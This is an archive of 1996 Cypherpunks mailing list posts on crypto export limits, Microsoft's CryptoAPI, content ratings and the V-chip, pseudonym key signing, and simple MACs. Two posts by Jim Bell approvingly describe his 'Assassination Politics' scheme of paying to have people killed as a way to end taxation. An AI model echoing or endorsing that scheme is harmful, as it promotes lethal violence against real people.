From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Fri, 26 Jan 1996 17:38:52 +0800
To: cypherpunks@toad.com
Subject: Re: 9th Circuit addresses vicarious liability
Message-ID: <199601260836.AAA09925@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:
> http://www.callaw.com/9415715.html
>

but it should have read:

http://www.callaw.com/9415717.html

--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruceab@teleport.com>
Date: Sat, 27 Jan 1996 09:49:56 +0800
To: cypherpunks@toad.com
Subject: Re: "This post is G-Rated"
Message-ID: <2.2.32.19960126084847.0069ba04@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:06 PM 1/25/96 -0800, Johnathan Corgan <jcorgan@aeinet.com> wrote:

>This would allow to emerge a free market 'ecology' of ratings agencies, 
>similar to the system that has emerged in the PC technology 
>market for product reviews.  

This seems to me a task of crucial importance, as I listen to the
conversations of relatively net-clueless folks. Their first reaction, upon
learning about net abuse, is to demand that abusers be tracked down and
punished. Privacy-enhancing tools make this more difficult. It seems to me
that if we're to avoid a wholescale crusade against net privacy, we _really_
need to have a credible alternative to offer: both the software and the
wetware :-) to let individuals screen out offending drek. Having canned
solutions is especially important, since many of the people most susceptible
to anti-privacy propaganda are precisely those who don't know and likely
aren't going to know how to construct their own filters.

I see this as a matter of enlightened self-interest, therefore.

I can't write code worth squat, but I can write other things. I'm starting
in on a Web-based guide to privacy tools, with screen shots and the like. If
anyone has useful info to contribute about screening out crud for novices,
write me! I need to hear from you!

Bruce Baugh
bruceab@teleport.com
http://www.teleport.com/~bruceab





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 26 Jan 1996 16:11:59 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Intl. Keysize Limit vs. U.S. Keysize Limit (Was: Re: Hack Lotus?)
In-Reply-To: <3106df37.flight@flight.hrnowl.lonestar.org>
Message-ID: <199601260550.AAA03377@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Paul Elliott writes:
> The real problem is the 64 bit key in the domestic version. This
> conforms to the NIST "standard" for an exportable system. In other
> words to allow the international people to have almost non-existant
> 40 bit security, they have limited domestic users to 64 bit secuity.

The 64-bit domestic limit really has no connection to the 40-bit intl. limit.
It would be just as easy to build the intl. version of Notes with 128-bit+spy
keys, with 40 bits of truly protected key and 88 bits of espionage-enabled 
key, and then use straight 128 bits in the domestic version. They simply 
appear not to want people in the U.S. to have >64 bits of security, 
regardless of export issues.

Futplex <futplex@pseudonym.com>		Still drowning in mail....

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQhrTSnaAKQPVHDZAQGPIQf+J1HO2onogc8tbaFFobWtv1K68wFmYqfl
6vb4OUxHyxuaow2QwbFXiOY3gUQZ61yCRhTgc6IcZOzJG0pBEXBV5B/Hb3fVdWJX
0L31f5/rzYIMsR0cnnEhMI6QtjtZC6V4MDlTnVuDjW/CBbMyWizEj/73dJTS5OxH
ekghkkvyObe6RbQTij/f3YVt+NYE94kiI/j9PXaq+n9mLJp4GID11EodD9Lwu3hD
Z2dA8kPcSagh1uT0SdQcyB/mYML2VhiBY13alPci20+UXfgot+8hSG7c8yUtcKrW
AmgtKI3/JLa5BwWcVC5XrvEX/L8xwzUB4FKCWUKhA5/+xiv8Kvxhdw==
=VQIm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Fri, 26 Jan 1996 15:39:12 +0800
To: e$@thumper.vmeng.com, cypherpunks@toad.com
Subject: Webcard
Message-ID: <Pine.LNX.3.91.960126011157.958B-100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain




Block Intros Visa Card For Internet Users 01/25/96
KANSAS CITY, MISSOURI, U.S.A., 1996 JAN 25 (NB) -- Block Financial,
an H & R Block (NYSE:HRB), company, has announced a Visa card
created just for Internet and World Wide Web users.

The card is called Webcard. One of its features is the ability to
check your account balance around the clock in real-time via the
Internet. "Cardholders can monitor their current account activity
or review data as far back as 12 months and even check to see if
their payment was received," said G. Cotter Cunningham, vice
president of Block Financial Corp.

The company said it has addressed security concerns about
revealing credit card numbers by designing the online account
review feature so actual account numbers never appear online.

To make the data more useful, Block has set up the Web site so the
account information can be imported directly in many of the popular
word processing, spreadsheet, database, and personal finance
programs, including Quicken.

Webcard is issued by Columbus Bank and Trust Company, an affiliate
of Synovus Financial Corp. The card carries no annual fee. The
company said it will soon launch a direct mail, advertising, and
telemarketing campaign to publicize the card.

Cunningham told Newsbytes the easiest way to apply for a card is to
complete an online application online. Block Financial's home page
on the Web is at http://www.conductor.com .

Cunningham said two levels of card are available. The Gold card is
the one being promoted. It carries a 12.9 percent interest rate for
the first six months. After that the rate reverts to whatever the
prime rate is, plus 6.9 percent. Currently the prime rate is 8.5
percent.

Applicants who don't qualify for the Gold card can still receive a
Classic card, said Cunningham. Initially that card carries a 12.9
percent interest rate for the first six months. After that, you
pay two points more than Gold card holders.

Block said the Webcard is the first in a series of co-branded
financial products slated for introduction this year. Other
services to be offered include online bill payment, which is set
for launch in the next 60 days, and online checking services.
Cunningham said the pricing structure for the bill payment
service hasn't been set yet, but will be competitive.

Block Financial already offers the Compuserve Visa, a credit card
exclusively for Compuserve subscribers. The company said it has
already issued more than 100,000 of the Compuserve cards.

(Jim Mallory/19960124/Press contact: Julie Eisen, Block Financial,
816-751-6010/WEBCARD960125/PHOTO)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Pugh <ampugh@mci.newscorp.com>
Date: Fri, 26 Jan 1996 20:28:43 +0800
To: cypherpunks@toad.com
Subject: RE: Microsoft's CryptoAPI - thoughts?
Message-ID: <199601260618.BAA14447@camus.delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


>>What does everyone think about this? Perhaps I already missed the boat, but
>>I just found out about it. How would international apps work? Would a data
>>file encrypted with an app compiled with a US-only CSP (cryptographic
>>service provider) be able to be loaded by a European equivalent app?
>>
>>[Info can be found at: http://www.microsoft.com/intdev/inttech/cryptapi.htm]

I too would be interested in any insights some of the folks here might have
on this API.
It would seem to me that in light of some of the discussions on this list
recently concerning the perversity of ITAR, that this API could easily run
afoul of it.

I've seen a brief article on it in pcweek and was suprised I'd not seen it
here yet. Perhaps I just missed it. I hate to say good things about M$, but
they certainly have the pull to perhaps get an API through.

amp





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 26 Jan 1996 18:57:11 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Re: "Gentlemen do not read each other's mail"
Message-ID: <m0tfkW0-000918C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:43 PM 1/25/96 -0800, Rich Graves wrote:


>Therefore, to ordain myself Devil's Advocate Being, is it not wrong, in
>principle, for us human beings to inquire into the affairs of the humans
>claiming the authority of Divine Governmental Beings? Are not the actions
>of the Fort Meade Beings a matter for their own personal conscience,
>absent any immediate, *direct* impact on us that would justify an
>appropriate reaction, be it fight, flight, or encryption? Please assume no
>funny theological beliefs in the existence of other Non-Divine Beings, or
>sympathy therewith. 
>
>Of course, on individual principle, I quite agree with you, which is why I
>do not believe I could ever become a cleric or even disciple of any odd
>religion. I'd really suck as a soldier, too.
>
>However, of Hobbes, Rousseau, Marx, Motesquieu, and Locke, I find Hobbes
>the most logical. People just suck, and ethics aren't enough. Karl Marx 
>and Jim Bell talk about the withering away of the government, but what 
>they're really talking about looks like a new and more onerous form of 
>government to me. 
>-rich
> Fucking Statist

You might be surprised.   I've considered that very question, which is at 
the "outer limits" of my "Assassination Politics" idea.   Question: could 
the principles of that system eventually result in some sort of 
super-tyranny?  In my opinion, no, if for no other reason than the average 
person simply doesn't have enough time to attempt to be tyrannical against 5 
billion other people on the planet.

How would it work?  Well, let's suppose 95% of the public believed that 
EVERYBODY, including the other 5%, should pay the Widget tax.  Each citizen 
would have to pay it, and prove that he paid it, or those 95% would pay to 
have the 5% killed.  The Widget tax would buy Widgets from the WIdget 
manufacturer, and they would installed so as to benefit THE PUBLIC. 

Problem is, taxes are collected, not simply to take them from one person, 
but to give them to another.  The 5% might have to pay the Widget Tax, but 
they could also pay to have the immediate beneficiaries of the Widget Tax 
killed (the manufacturers of the widgets themselves, or at least those 
manufacturers that accept orders for widgets paid for by stolen tax 
dollars.)  At this point, nobody will risk making widgets anymore, so  the 
Tax will be unjustified and bandoned as uncollectible and useless.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: postmaster@ncr-sd.SanDiegoCA.ATTGIS.COM
Date: Fri, 26 Jan 1996 18:30:47 +0800
Subject: SMTP mail warning
Message-ID: <9601260939.AB28460@toad.com>
MIME-Version: 1.0
Content-Type: message

message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 26 Jan 1996 18:50:50 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <199601260939.BAA26137@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:18 PM 1/24/96 -0800, Jeff Weinstein <jsw@netscape.com> wrote:
>Mike Tighe wrote:
>> >  I can see two practical ways to build a netscape product outside
>> >  the US.  The first is to export the source code for the Navigator
>> >  with the crypto code removed.  ....
>> Didn't Netscape already promise to remove the hooks? It seems to me all of
>> the major software players are already in bed with the government.
>
>  What do you mean by "promise to remove the hooks"?

I think Mike's remembering the NCSA freeware httpd server which had the
crypto code removed at the NSA's request.  I don't remember if that was
before or after the Mosaic developers left to form Netscape, but being
an organization that gets government grant money subjects you to more
leverage than a random commercial company.

One seeming paradox of the law is that you're not allowed to export
"components of a cryptosystem", e.g. software with the crypto routines
removed but everything else there.  But you are allowed to export code
that the NSA has determined isn't strong enough to bother them,
including applications with wimpy cryptosystems.  The Clipper II escrow
standardization folks attempted to get industry to agree on
wiretap-enabled short-key software with tampering protection
in return for export permission, but as far as I know the current
not-officially-defined policy of 40 bits doesn't require that 
export-requesting software be non-modular; how much work would it be
to binary-patch-replace the 40-bit subroutines in current Netscape
with 128-bit subroutines?  (More work than just mailing the US version
overseas, I suppose :-)  Obviously Netscape couldn't do it themselves
if they wanted to ever get export permission again, but they could 
always issue a press release condemning the nasty foreigners for
hacking their product ("We're SHOCKED to discover that HACKING
is going on with our software!")
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: postmaster@ncr-sd.SanDiegoCA.ATTGIS.COM
Date: Fri, 26 Jan 1996 18:43:18 +0800
Subject: SMTP mail warning
Message-ID: <9601260951.AB29137@toad.com>
MIME-Version: 1.0
Content-Type: message

message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 27 Jan 1996 20:27:26 +0800
To: cypherpunks@toad.com
Subject: Re: "Gentlemen do not read each other's mail"
Message-ID: <199601260940.BAA26226@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:47 PM 1/25/96 -0500, Perry wrote:
>Why is he our patron saint? He was a government official coming out
>against invasion of privacy. Isn't that what we are all after, in the
>end? The reason we deploy cryptography is to assure privacy for
>all. We often refer to those who listen in on conversations
>(regardless of who they are) as, in some sense, our
>opposition. Therefore, is not Stimson's remark in closing down
>Yardley's "Black Chamber" to be praised rather than attacked?

These days, I'd be happy with "Gentlemen only read _each others'_ mail"....
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 26 Jan 1996 18:34:22 +0800
To: cypherpunks@toad.com
Subject: Re: Signing nyms' keys (Was: Report on Portland Cpunks...)
Message-ID: <199601260940.BAA26328@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> Over time, some nyms take on a distinct identity of their own. [...] The
>> thought, therefore, as I imagine it would be "You don't know I am in person,
>> but you can count on me to be who I am, with this style and set of views,
>> and I say that this guy is another actual person with the same."

This much can be accomplished by the nym-user signing all messages 
with a consistent key.  However, a signature does somewhat assert that
the signer believes the keyholder is the same John Doe that folks in the
signer's circle of acquaintances expect, and that the purported keyholder
(who may still be anonymous/pseudonymous) really holds the key,
and maybe that the keyholder is the only person with that name whose
key he's signed.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 26 Jan 1996 18:38:52 +0800
To: cypherpunks@toad.com
Subject: Re: V-chip?
Message-ID: <199601260940.BAA26366@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


This message rated FZ.

At 08:33 PM 1/24/96 -0800, mpd@netcom.com (Mike Duvos) wrote:
>As I understand it, the basic concept behind the V-Chip is to
>allow selective blocking of material a particular viewer might
>find offensive based on content information transmitted along
>with the program.  As long as the program material itself is
>transmitted unaltered, and there are multiple non-governmental
>providers of content descriptions catering to the spectrum of
>human likes and dislikes, this sounds like ideal Cypherpunk
>technology.

No, it's to allow selective blocking of material that
a government-approved panel has described as deserving
blocking for children.  It's rabidly unnecessary,
and also too simplistic to be really useful.  For instance,
it's unlikely to block "COPS" and "The War In Bosnia"
under any available settings, and "Speeches of President Exon" 
will probably be required viewing because there isn't a "no lies"
setting.  Selective blocking, using VCRplus codes or some similar
technology, would be far more useful, support multiple rating
services, and give your VCR something to do other than flash 12:00.

...
>What are the dangers of this new technology?
>First, the government might want only one description of content,
>which it controls.  My notion of what is offensive probably
>differs greatly from that of Jesse Helms, for instance.
Yup.  However, _you_ won't be the one doing the description...
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 26 Jan 1996 18:41:18 +0800
To: cypherpunks@toad.com
Subject: Re: Why is blowfish so slow? Other fast algorithms?
Message-ID: <199601260940.BAA26380@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> At 07:32 PM 1/23/96 -0500, David A Wagner wrote:
>> >If you want authentication, you must use a crypto-strength MAC.
>> >Encryption (be it RC4, DES, etc.) is not enough.

Are there any simple but crypto-strong hash functions?
I've been thinking about doing a "One Page Privacy" program,
using the 3-line RSA, 10-line RC4, and some glue,
but using a separate MD5 program seemed like cheating
(even though the 3-line RSA uses dc :-).  
I was thinking about using RC4 in some feedback mode as a MAC,
but it sounds like that's not secure enough?  Is there anything
else that's short?  MD5 requires too much code.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 26 Jan 1996 18:53:44 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Re: "Gentlemen do not read each other's mail"
Message-ID: <m0tfkpF-0008xkC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:14 PM 1/25/96 -0800, Rich Graves wrote:

>
>I believe that the choice not to read other people's personal mail is an
>ethical imperative, since we do not have and probably can not have total
>privacy enforced by technology and law alone. Sure, strong crypto helps,
>and should be spread, but there will always be back doors and
>implementation bugs, and in the worst case, most people will give in to
>moderate torture. 
>
>It's hard to say what the ethical role of individuals in the government
>(or Jim Bell's "assassination politics" organization, which quacks like a
>government for me) is.

Needless to say, I disagree.  If you define government as, "That entity 
which keeps me from doing bad things to people,"  then a S+W model 629 .44 
caliber revolver "quacks like a government to you."

If the reason you don't do bad things in public because people will sneer at 
you and criticize, then sneering and criticizing "quacks like a government 
to you."

What "Assassination Politics" does is to eliminate the ability of 51% of the 
population to control the remaining 49%.  If there is any residual 
pro-government bias left in this system, tell me and I will work strongly to 
root it out.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 26 Jan 1996 17:07:30 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: TOP_tap
In-Reply-To: <Pine.SOL.3.91.960125140223.1505B-100000@chivalry>
Message-ID: <Pine.SV4.3.91.960126020442.19760A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> I kinda feel sorry for the NSA staffers sometimes - they're basically a 
> bunch of computer geeks and math whizs who don't get to wear jeans and 
> T-shirts

        says who?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: williams@va.arca.com (Jeff Williams)
Date: Fri, 26 Jan 1996 14:20:25 +0800
To: cypherpunks@toad.com
Subject: Re: "This post is G-Rated"
Message-ID: <1933823965.299772740@va.arca.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:

> So deal with the hypothetical I gave: someone like me sets out to "nuke"
> the labelling system by deliberately mislabelling his posts! If you have
> labels but no means of stopping my actions, see what results.

What if there was a flag on each message which the author could leave
"UNSPECIFIED" or indicate "NOT INTENDED FOR KIDS." You could attack by
marking a bunch of bland stuff "NIFK" or you could leave some porn
"UNSPECIFIED".  Either way, I think the situation is better for kids. I hope
that the majority of Internet users are not actively trying to get porn to
kids.

> A meaningful "parental filter" cannot be done on-the-fly with self-ratings.
> Some minor steps can be taken, but not all worth the expense and hassle of
> a mandatory system.

I see labels as helpful rather than restrictive. A label provides additional
information to help people find the information that they want. That
information can also be used to help you cut out the information you don't
want. If parents want to use this flag because they think it might help their
kids, great.

Maybe nobody would use the flag, but I don't see how it could hurt. If I had
kids, I would appreciate having the option of sorting out all the stuff that
is "NIFK" by the author.

--Jeff





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sun, 28 Jan 1996 09:28:37 +0800
To: cypherpunks@toad.com
Subject: Re: John Doe
Message-ID: <199601260707.CAA00990@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 25, 1996 20:58:48, 'jdoe-0007@alpha.c2.org' wrote: 
 
 
>The John Doe NYM/Remailer interface for Windows is a most excellent 
>program that will allow even the most cypher-illiterate to make use of 
>the technology that has been the exclusive domain of those in the 
>"techno-know".  It was a piece of cake to set up, obtain a NYM and select 
>inbound and outbound remailers with options to chain as many as your 
>paranoia deemed appropriate. 
> 
>$25.00 seemed a little steep but they will get my $$$.  Nice Job. 
> 
>John Doe 0007 
> 
 
No, I am not jdoe-0007. 
 
We satanic-socialist-statists all use preliminary trial copies of JOHN-DOE
set to jdoe-666. 
 
It is in our contract with the Sales Rep of Darkness and we are widely
known for always respecting contracts. 
 
Look out UNIX users! With JOHN-DOE us WINDOZE users under the leadership of
our glorius Chairman Bill are gonna' get the rest of your body too! 
 
(Unlike jdoe-0007 I think $25 is a very low price to pay for the new
capacity. What the hell! We're not gonna' pay for it out of our own lazy
pockets. We'll raise the tax on hot tubs and get other people to buy it for
us.) 
 
-- 
tallpaul 
 
"To understand the probable outcome of the Libertarian vision, see any
cyberpunk B movie wherein thousands of diseased, desparate and starving
families sit around on ratty old couches on the streets watching television
while rich megalomaniacs appropriate their body parts for their personal
physical immortality." 
     R. U. Sirius 
     _The Real Cyberpunk Fakebook_




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 26 Jan 1996 17:13:52 +0800
To: Jay Holovacs <holovacs@styx.ios.com>
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <Pine.3.89.9601251855.A12680-0100000@styx.ios.com>
Message-ID: <Pine.SV4.3.91.960126021308.19760C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain




> > By not taking adequate steps to inform itself of the Japaneese
 intentions the US 
> > suffered the loss of a substantial part of the US fleet at Pearl Harbour.


   I've read that FDR had a humint source warning of a Japanese strike on 
Pearl Harbor. I also recall reading that J Edgar Hoover received a report 
of a diplomatic conversation detailing the planned attack, but sat on it.

The first was in a monograph which was putting forth the proposition that 
FDR  ardently desired to become involved in the war.  By the way, FDR was 
the man who made wage income, subject to federal taxation for the first 
time.

I don't remember where I read the second.

To me, both stories are plausible.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 26 Jan 1996 17:10:22 +0800
To: David Lesher <wb8foz@nrk.com>
Subject: Re: TOP_tap
In-Reply-To: <199601252341.SAA00886@nrk.com>
Message-ID: <Pine.SV4.3.91.960126022034.19760D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


How is parking at Fort Meade?

Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 26 Jan 1996 17:29:09 +0800
To: David Lesher <wb8foz@nrk.com>
Subject: Re: TOP_tap
In-Reply-To: <199601260130.UAA01330@nrk.com>
Message-ID: <Pine.SV4.3.91.960126023428.19760I-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> This *is* a real problem. They take very highly skilled geniuses and
> tell them "no one will ever know what you've done.." & their morale does
> suffer...
> 
> Just suppose YOU discovered (say) a new factoring method... and
> could only watch others getting Nobel prizes.....


  Maybe they think that anyone who is worthy of knowing - works at NSA. 
As Wittgenstein noted, "where the masses also drink, all wells are poisoned".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 26 Jan 1996 17:25:37 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <199601260152.UAA16955@jekyll.piermont.com>
Message-ID: <Pine.SV4.3.91.960126024700.19760J-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


<< "I don't believe in governments">>

  "Pray for the preservation of the government, other wise men would each 
each other alive" - Talmud.

No visible stigmata, eh?   How many elections have you won, Perry?  (I 
only use the honorific sobriquet "Honorable" when addressing folks who've 
won an election.  In my book, a cabinet secretary ain't an Honorable). 
How many oaths have you sworn to protect and defend the constitution?


Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 26 Jan 1996 17:26:33 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Microsoft's CryptoAPI - thoughts?
In-Reply-To: <v01520d0200111847fc42@[153.37.173.54]>
Message-ID: <199601260802.DAA08993@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

rickt@psa.pencom.com writes:
> [Info can be found at: http://www.microsoft.com/intdev/inttech/cryptapi.htm]

Has someone here managed to extract PostScript hardcopy of the CAPI from this
Web page? I tried earlier this evening and wound up with a miniature 
ecological disaster on my hands. The page says:

"For ease of online reading and printing, we've provided copies of this
lengthy document in Microsoft Word and Postscript formats."

I grabbed the ZIPped PostScript version and unZIPped it, which resulted in a
single file called "capiapp.ps". Making the wild assumption that this was
indeed a PostScript file, I sent it to the printer and forgot about it for a
while. 

An hour later I discovered a chaotic scene in the printer room, as the
printer had spewed about 1.5 reams of raw PostScript printouts. The output bin
had overflowed for a while, spraying paper in several directions. <heavy sigh>

As it turns out, the file unhelpfully begins with 
	%-12345X@JPL ENTER LANGUAGE=POSTSCRIPT
preceding the usual "%!PS-Adobe-3.0" line. Worse still, it appears that the
capiapp.ps file is actually a catenation of many PostScript files (one per
chapter?), each beginning with a version of this ensnarling line.

I could do some global search-and-replacing, etc., but I think I'll wait for
Microsoft to distribute a decent PS version of this document. Perhaps they
should consider not generating it with MS Word....

Grr! 

Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQiKcynaAKQPVHDZAQEwQAf/SLkD9a4vP7Vl5md0WzPCE+v0fX83W0Hw
wj0OJLs7gRcyLJx0eLcBxR7G86CGRwRRLat+QbhEPqaiNipQTG0W5EgF+i/6DlCk
y7c8adATFrPCGOjNS49nnPWtpBEUo+q9ZLHYzYkPHnt8k+8q7EZnET/wO9GV8VJg
ZsjjQeslR2/r9KnzyXaFsuQpPI0Vgl7/ilTE03bPWoiHrzQvQTGIABQr5seRORWb
3RDLee1KOfXBPfpzlPNt/K6bcPFu2sRLLMCUAtImm5hSHCjdelkD+3sZAlaJpHwH
Se9osUfNlMM3ohFZydOezjlWsGzIZgLPxMouQgvX2MDcJTwQSe7ZyA==
=XHjr
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 26 Jan 1996 18:52:50 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Quick MACs (Re: Why is blowfish so slow? Other fast algorithms?)
In-Reply-To: <199601260940.BAA26380@ix7.ix.netcom.com>
Message-ID: <199601261012.FAA14755@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Bill Stewart writes:
> Are there any simple but crypto-strong hash functions?
[...]
> I was thinking about using RC4 in some feedback mode as a MAC,
> but it sounds like that's not secure enough?  Is there anything
> else that's short?  MD5 requires too much code.

Phil Rogaway gave a great talk at RSADSC about keyed hashing MACs. In all he
described 12 different MACs (some of them variations on a theme), and gave
some efficiency/security tradeoff numbers relative to the security of the
underlying hash function. 

Apparently he had a paper in Crypto `95 about
bucket hashing, which is generally fast and simple and apparently pretty
secure. The idea is to place each word of the message into a unique fixed-size
subset of a large set of buckets, XOR each bucket internally, then concatenate
the results. I haven't yet read the paper (though I expect to do so soon), so
I don't know all the details. I think the notion is that you can plug in any 
pseudo-random function to select the buckets, and get provably good security 
if you know your function is suitably pseudo-random.

Check:

http://wwwcsif.cs.ucdavis.edu/~rogaway/talks/list.html

which has a link to his slides from last week, and

http://wwwcsif.cs.ucdavis.edu/~rogaway/papers/list.html

which has links to a heap of papers, including the full version of the
Crypto `95 bucket hashing one.

Futplex <futplex@pseudonym.com>
"a heap of PS papers that I _can_ print out without destroying whole forests"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQiouCnaAKQPVHDZAQHo+Af7BtpL5kErtzeWR0dBuR1/rOfQzw8Ezaxi
Gp7Va8kjJLYJlWa1+Ih2fbKr8oUIKL1N1a5JoDarr2G75B9GilyyjCIf75FIrWnZ
JQDti8wJIK6TGV9ClZGbl6jowUkc4PtFzp6VN85K/Rnv/l/Wekv4kWl41O2Cq656
bsQaE2jYAfRqkOziarytaszVROoTNbGvyYoLk1ESf9yijwp0E9R/SXlw4OvUAna7
qSnuhbIayLX8auQWxoUf9lRlJ8tdreqXzP2G4yL1tXI+i+nr6z3A9m/+sXXCxNb1
vzQtUTkVtCniKoGrtm7WN0RtusjIrVEoaDi/msx+ADBphHGxPxIJlA==
=g1Jt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 26 Jan 1996 19:31:55 +0800
To: cypherpunks@toad.com
Subject: Re: "This post is G-Rated"
Message-ID: <2.2.32.19960126111304.00968f58@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:58 PM 1/25/96 -0800, Bill Frantz wrote:

>The big problem is how are the labels attached to the programs.  I
>agree with Tim that it is probably imposible for individual Usenet
>postings.  However is should be possible for TV programs, and whole
>newsgroups.

Since TV programs will soon *be* "individual Usenet postings," it will not
be possible to rate them.  Even the Earth doesn't have that much time.  The
economic "drag" involved would be too great.

Once we have high-speed connections to the nets, the amount of video out
there will explode.  There will be more to watch than watchers (remember
video archives).  Search engines will help people find what they want and
avoid what they don't want.  "Sex and Drugs and Rock and Roll" (Wine, Women,
and Song) will be like any other available subject -- some will want to find
it and some will want to avoid it.  Just another problem of how to extract
the content you want from all the mess.  Search engines won't be all that
perfect but they will be all we have.

One wonders why people spend so much time arguing about the V-chip, telecoms
dereg, sex on the net, Trade Policy, or Immigration when it's intuitively
obvious that these things are (or soon will be) no longer subject to central
control of any kind.

DCF

"King Canute, we are here!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 26 Jan 1996 20:10:01 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: This is not "DivineBeingPunks"
